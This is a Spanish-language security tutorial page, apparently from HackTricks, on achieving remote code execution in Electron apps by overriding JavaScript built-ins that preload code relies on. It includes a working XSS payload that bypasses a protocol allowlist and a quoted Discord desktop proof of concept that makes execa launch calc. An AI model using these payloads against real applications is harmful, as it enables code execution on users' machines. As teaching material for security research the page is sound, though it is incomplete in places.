5.9 KiB
Electron contextIsolation RCE via preload code
Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén el oficial PEASS & HackTricks swag
- Descubre The PEASS Family, nuestra colección de NFTs exclusivos
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de HackTricks y HackTricks Cloud.
Ejemplo 1
Este código abre enlaces http(s) con el navegador predeterminado:
Algo como file:///C:/Windows/systemd32/calc.exe podría ser utilizado para ejecutar una calculadora, el SAFE_PROTOCOLS.indexOf lo está previniendo.
Por lo tanto, un atacante podría inyectar este código JS a través de XSS o navegación arbitraria de páginas:
<script>
Array.prototype.indexOf = function(){
return 1337;
}
</script>
Dado que la llamada a SAFE_PROTOCOLS.indexOf siempre devolverá 1337, el atacante puede eludir la protección y ejecutar la calculadora. Exploit final:
<script>
Array.prototype.indexOf = function(){
return 1337;
}
</script>
<a href="file:///C:/Windows/systemd32/calc.exe">CLICK</a>
Verifica las diapositivas originales para otras formas de ejecutar programas sin que aparezca un aviso pidiendo permisos.
Aparentemente, otra forma de cargar y ejecutar código es accediendo a algo como file://127.0.0.1/electron/rce.jar
Ejemplo 2: RCE de la aplicación Discord
Ejemplo de https://mksben.l0.cm/2020/10/discord-desktop-rce.html?m=1
Al revisar los scripts de precarga, descubrí que Discord expone la función, que permite llamar a algunos módulos permitidos a través de DiscordNative.nativeModules.requireModule('NOMBRE-MÓDULO'), en la página web.
Aquí, no pude usar módulos que se pueden utilizar para RCE directamente, como el módulo child_process, pero encontré un código donde se puede lograr RCE al sobrescribir los métodos integrados de JavaScript e interferir con la ejecución del módulo expuesto.
El siguiente es el PoC. Pude confirmar que la aplicación calc se abre cuando llamo a la función getGPUDriverVersions que está definida en el módulo llamado "discord_utils" desde devTools, mientras sobrescribo el RegExp.prototype.test y Array.prototype.join.
RegExp.prototype.test=function(){
return false;
}
Array.prototype.join=function(){
return "calc";
}
DiscordNative.nativeModules.requireModule('discord_utils').getGPUDriverVersions();
La función getGPUDriverVersions intenta ejecutar el programa utilizando la librería "execa", de la siguiente manera:
module.exports.getGPUDriverVersions = async () => {
if (process.platform !== 'win32') {
return {};
}
const result = {};
const nvidiaSmiPath = `${process.env['ProgramW6432']}/NVIDIA Corporation/NVSMI/nvidia-smi.exe`;
try {
result.nvidia = parseNvidiaSmiOutput(await execa(nvidiaSmiPath, []));
} catch (e) {
result.nvidia = {error: e.toString()};
}
return result;
};
Normalmente, execa intenta ejecutar "nvidia-smi.exe", que está especificado en la variable nvidiaSmiPath, sin embargo, debido a la anulación de RegExp.prototype.test y Array.prototype.join, el argumento se reemplaza por "calc" en el procesamiento interno de _execa_**.
Específicamente, el argumento se reemplaza cambiando las siguientes dos partes.
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
Otras formas de apoyar a HackTricks:
- Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Obtén el oficial PEASS & HackTricks swag
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @carlospolopm.
- Comparte tus trucos de hacking enviando PRs a los repositorios de HackTricks y HackTricks Cloud.